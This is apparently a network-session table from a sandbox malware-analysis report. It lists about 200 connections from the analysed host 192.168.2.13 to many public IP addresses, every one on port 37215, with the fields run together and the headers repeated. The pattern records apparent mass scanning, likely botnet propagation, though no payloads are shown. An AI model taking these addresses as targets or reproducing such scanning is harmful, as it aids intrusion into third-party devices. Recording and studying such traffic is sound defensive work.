                                                  11453192.168.2.1339948157.43.76.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11454192.168.2.133839841.11.46.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11455192.168.2.134088041.127.242.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11456192.168.2.134718241.160.112.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11457192.168.2.1359392197.244.67.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11458192.168.2.1336844197.20.119.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11459192.168.2.1339126106.86.56.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11460192.168.2.1349254157.157.75.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11461192.168.2.1355974176.182.152.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11462192.168.2.134786041.141.206.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11463192.168.2.1332924188.83.120.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11464192.168.2.1341090197.226.135.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11465192.168.2.1335586197.165.139.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11466192.168.2.1344622157.41.36.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11467192.168.2.133654441.199.83.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11468192.168.2.135470041.72.237.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11469192.168.2.1359330157.35.185.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11470192.168.2.135969241.216.199.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11471192.168.2.1358284197.13.168.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11472192.168.2.1353254172.107.14.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11473192.168.2.1340502175.102.26.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11474192.168.2.135948241.3.159.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11475192.168.2.135069441.59.113.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11476192.168.2.1345432157.1.203.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11477192.168.2.1336436223.156.215.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11478192.168.2.1350002157.196.226.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11479192.168.2.1345262197.192.174.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11480192.168.2.1359120197.156.253.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11481192.168.2.1353558221.84.60.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11482192.168.2.1349884197.223.195.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11483192.168.2.133464427.207.236.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11484192.168.2.136012241.87.63.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11485192.168.2.1339214197.101.115.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11486192.168.2.1336496157.48.58.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11487192.168.2.1344474197.250.233.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11488192.168.2.134319445.225.10.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11489192.168.2.134342441.237.116.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11490192.168.2.1353988197.131.74.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11491192.168.2.135553041.152.246.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11492192.168.2.1349364197.224.43.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11493192.168.2.1357288197.17.179.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11494192.168.2.1349306157.188.121.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11495192.168.2.1336876197.248.206.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11496192.168.2.1360028140.109.71.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11497192.168.2.136046241.64.255.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11498192.168.2.1337960157.141.231.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11499192.168.2.1355074157.195.57.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11500192.168.2.1345828197.80.240.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11501192.168.2.135982241.216.149.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11502192.168.2.1333658168.190.89.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11503192.168.2.133536693.62.168.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11504192.168.2.1353290157.175.83.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11505192.168.2.134881698.212.86.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11506192.168.2.1355476197.78.13.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11507192.168.2.134743041.50.250.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11508192.168.2.1351838197.162.215.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11509192.168.2.134435241.64.116.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11510192.168.2.1336312157.22.198.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11511192.168.2.1360142197.64.19.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11512192.168.2.1352242157.131.175.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11513192.168.2.134666018.112.180.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11514192.168.2.1339096197.123.54.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11515192.168.2.1356328157.132.104.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11516192.168.2.136030641.35.202.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11517192.168.2.1339372157.122.103.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11518192.168.2.1344320197.78.178.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11519192.168.2.1358002197.20.203.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11520192.168.2.1350358197.118.63.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11521192.168.2.1339056197.211.121.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11522192.168.2.135931631.208.19.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11523192.168.2.1358690197.161.11.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11524192.168.2.134839841.153.222.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11525192.168.2.1338818197.205.20.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11526192.168.2.1346956197.222.140.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11527192.168.2.1360326153.156.3.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11528192.168.2.133330825.69.217.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11529192.168.2.1359526197.3.25.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11530192.168.2.1351436197.125.136.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11531192.168.2.1342950197.88.77.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11532192.168.2.1344556108.48.159.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11533192.168.2.133351034.217.99.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11534192.168.2.1342262157.165.172.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11535192.168.2.133332241.39.39.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11536192.168.2.135203841.39.32.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11537192.168.2.1340968157.77.48.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11538192.168.2.134862441.198.208.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11539192.168.2.1345820197.82.128.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11540192.168.2.134187241.125.205.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11541192.168.2.134493041.102.76.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11542192.168.2.135785278.157.127.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11543192.168.2.1347424185.98.143.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11544192.168.2.1345678157.31.148.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11545192.168.2.133909298.14.63.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11546192.168.2.135665041.105.129.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11547192.168.2.1337854197.60.183.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11548192.168.2.135777062.237.109.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11549192.168.2.1355408197.21.116.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11550192.168.2.1344546157.11.132.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11551192.168.2.135000041.4.162.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11552192.168.2.1338972176.246.28.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11553192.168.2.134011435.146.95.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11554192.168.2.1360642157.7.240.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11555192.168.2.135978641.54.214.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11556192.168.2.133633641.175.53.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11557192.168.2.134361441.148.39.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11558192.168.2.1357764197.31.132.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11559192.168.2.133419418.83.239.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11560192.168.2.1341852157.254.143.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11561192.168.2.1336608157.181.247.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11562192.168.2.135742441.156.15.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11563192.168.2.133943641.110.138.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11564192.168.2.1344410197.65.31.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11565192.168.2.134902441.88.212.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11566192.168.2.1338744157.229.78.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11567192.168.2.1349994197.106.167.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11568192.168.2.1336098157.61.47.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11569192.168.2.135480265.195.194.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11570192.168.2.1338736157.211.190.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11571192.168.2.1355376197.253.251.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11572192.168.2.133678641.201.113.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11573192.168.2.135298624.132.208.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11574192.168.2.1339216157.100.92.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11575192.168.2.1358538175.176.0.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11576192.168.2.1341394101.142.200.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11577192.168.2.135204894.160.50.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11578192.168.2.1349818197.211.156.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11579192.168.2.133991441.121.92.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11580192.168.2.1348820170.26.18.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11581192.168.2.1343922156.244.127.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11582192.168.2.135830241.125.240.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11583192.168.2.1348654157.91.226.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11584192.168.2.135865618.147.139.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11585192.168.2.135803041.154.112.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11586192.168.2.134041046.195.177.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11587192.168.2.133711644.216.25.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11588192.168.2.1354378157.8.245.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11589192.168.2.136056641.24.151.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11590192.168.2.1337230197.41.239.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11591192.168.2.1345218157.57.69.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11592192.168.2.1337716197.12.59.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11593192.168.2.133383482.225.44.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11594192.168.2.134099241.17.36.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11595192.168.2.1344478157.43.97.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11596192.168.2.134884241.145.156.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11597192.168.2.1348842197.154.81.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11598192.168.2.1339750197.191.234.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11599192.168.2.1340162157.37.34.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11600192.168.2.135106041.33.225.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11601192.168.2.133494441.102.185.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11602192.168.2.1358206157.58.10.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11603192.168.2.1334756157.9.44.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11604192.168.2.135330841.196.164.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11605192.168.2.133656886.72.53.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11606192.168.2.1358216157.243.201.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11607192.168.2.1341264197.21.115.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11608192.168.2.134966841.1.40.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11609192.168.2.133647259.139.170.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11610192.168.2.135631641.62.196.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11611192.168.2.1340156197.76.71.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11612192.168.2.134233241.174.226.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11613192.168.2.1347578165.228.182.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11614192.168.2.134446641.141.120.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11615192.168.2.1339022135.150.168.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11616192.168.2.134931041.227.40.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11617192.168.2.1334226197.108.157.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11618192.168.2.1354366106.137.194.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11619192.168.2.1340984197.58.1.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11620192.168.2.134114241.111.122.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11621192.168.2.1345864197.98.218.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11622192.168.2.135512841.15.161.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11623192.168.2.1354796157.25.238.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11624192.168.2.135571241.5.26.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11625192.168.2.1355826188.221.178.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11626192.168.2.1348250157.0.197.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11627192.168.2.134395031.81.236.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11628192.168.2.1349316157.5.55.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11629192.168.2.1358820197.52.27.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11630192.168.2.133786641.138.109.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11631192.168.2.133551641.202.131.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11632192.168.2.1340856197.204.151.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11633192.168.2.133883046.235.107.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11634192.168.2.1358350197.139.68.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11635192.168.2.1338998157.172.85.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11636192.168.2.1355310197.239.194.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11637192.168.2.1341500197.69.11.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11638192.168.2.1359036197.51.8.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11639192.168.2.1357550197.120.106.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11640192.168.2.135250241.184.52.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11641192.168.2.1338576157.184.166.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11642192.168.2.1333940195.70.61.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11643192.168.2.135771241.60.103.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11644192.168.2.1345736197.175.58.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11645192.168.2.135423841.47.179.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11646192.168.2.133424637.35.236.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11647192.168.2.135215241.69.44.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11648192.168.2.1357834197.9.111.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11649192.168.2.1357402169.238.233.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11650192.168.2.133732241.85.170.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11651192.168.2.1341818157.185.112.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11652192.168.2.1345250185.215.26.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11653192.168.2.135587241.200.129.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11654192.168.2.1347576110.137.41.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11655192.168.2.1348622157.243.117.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11656192.168.2.1348076197.238.174.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11657192.168.2.1354512157.187.119.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11658192.168.2.136089041.87.225.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11659192.168.2.133994425.240.160.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11660192.168.2.1350252107.13.171.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11661192.168.2.134669641.254.113.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11662192.168.2.1349512197.154.199.7837215
